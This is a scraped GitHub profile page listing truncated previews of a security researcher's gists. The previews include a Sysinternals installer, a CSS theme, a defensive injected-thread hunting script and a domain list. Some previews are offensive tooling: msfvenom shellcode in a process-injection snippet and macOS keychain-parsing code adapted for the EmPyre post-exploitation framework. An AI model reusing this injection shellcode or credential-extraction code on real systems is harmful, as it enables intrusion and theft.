Skip to content

Instantly share code, notes, and snippets.

View killswitch-GUI's full-sized avatar

Alexander Rymdeko-Harvey killswitch-GUI

View GitHub Profile
Write-Host "$('[{0:HH:mm}]' -f (Get-Date)) Installing SysInternals Tooling..."
$sysinternalsDir = "C:\Tools\Sysinternals"
$sysmonDir = "C:\ProgramData\Sysmon"
If(!(test-path $sysinternalsDir)) {
New-Item -ItemType Directory -Force -Path $sysinternalsDir
} Else {
Write-Host "$('[{0:HH:mm}]' -f (Get-Date)) Tools directory exists, no need to re-install. Exiting."
exit
}

Fallout Terminal Inspired Style

A retro theme mimicking the terminal designs in the Fallout video game franchise. It uses CSS animation for a screen flicker effect and a simple scroll (I'm working on a better line by line scroll).

A Pen by Mack Richardson on CodePen.

License.

{
"domain": "slack.com",
"active": true,
"last_update": 1525850454.678481,
"email_pattern": "",
"email_count": 3,
"emails": [
{
"email_address": "[email protected]",
"first_name": "",
@killswitch-GUI
killswitch-GUI / Get-InjectedThread.ps1
Created November 11, 2017 18:47 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
OS Name: Microsoft Windows 10 Pro
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
System Manufacturer: Micro-Star International Co., Ltd
System Model: MS-7A32
System Type: x64-based PC
Total Physical Memory: 32,715 MB
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 1 AMD ~3800 Mhz (RYZEN 1700x)
@killswitch-GUI
killswitch-GUI / NotCreateRemoteThread.c
Created February 26, 2017 21:32 — forked from securifybv/NotCreateRemoteThread.c
Run shell code in another process without CreateRemoteThread
#pragma comment(lib, "Shell32.lib")
#include <windows.h>
#include <shlobj.h>
// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe
int buf_len = 193;
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
#!/usr/bin/python
# Pure Python Tiny Packet Snifer
# Author: Alexander Rymdeko-Harvey
# Twitter: @Killswitch-GUI
# BSD 3-Clause License
# Copyright (c) 2017, Alexander Rymdeko-Harvey
# All rights reserved.
This file has been truncated, but you can view the full file.
unsigned char wpcap_dll[] = {
0x4d, 0x5a, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
0xff, 0xff, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x08, 0x01, 0x00, 0x00, 0x0e, 0x1f, 0xba, 0x0e, 0x00, 0xb4, 0x09, 0xcd,
0x21, 0xb8, 0x01, 0x4c, 0xcd, 0x21, 0x54, 0x68, 0x69, 0x73, 0x20, 0x70,
0x72, 0x6f, 0x67, 0x72, 0x61, 0x6d, 0x20, 0x63, 0x61, 0x6e, 0x6e, 0x6f,
0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6e, 0x20, 0x69, 0x6e, 0x20,
This file has been truncated, but you can view the full file.
google.com
youtube.com
facebook.com
baidu.com
yahoo.com
amazon.com
wikipedia.org
google.co.in
twitter.com
qq.com
# built off https://github.com/n0fate/chainbreaker
# for EmPyre dynamic execution
# all credit goes too: n0fate
# http://web.mit.edu/darwin/src/modules/Security/cdsa/cdsa/cssmtype.h
KEY_TYPE = {
0x00+0x0F : 'CSSM_KEYCLASS_PUBLIC_KEY',
0x01+0x0F : 'CSSM_KEYCLASS_PRIVATE_KEY',
0x02+0x0F : 'CSSM_KEYCLASS_SESSION_KEY',
0x03+0x0F : 'CSSM_KEYCLASS_SECRET_PART',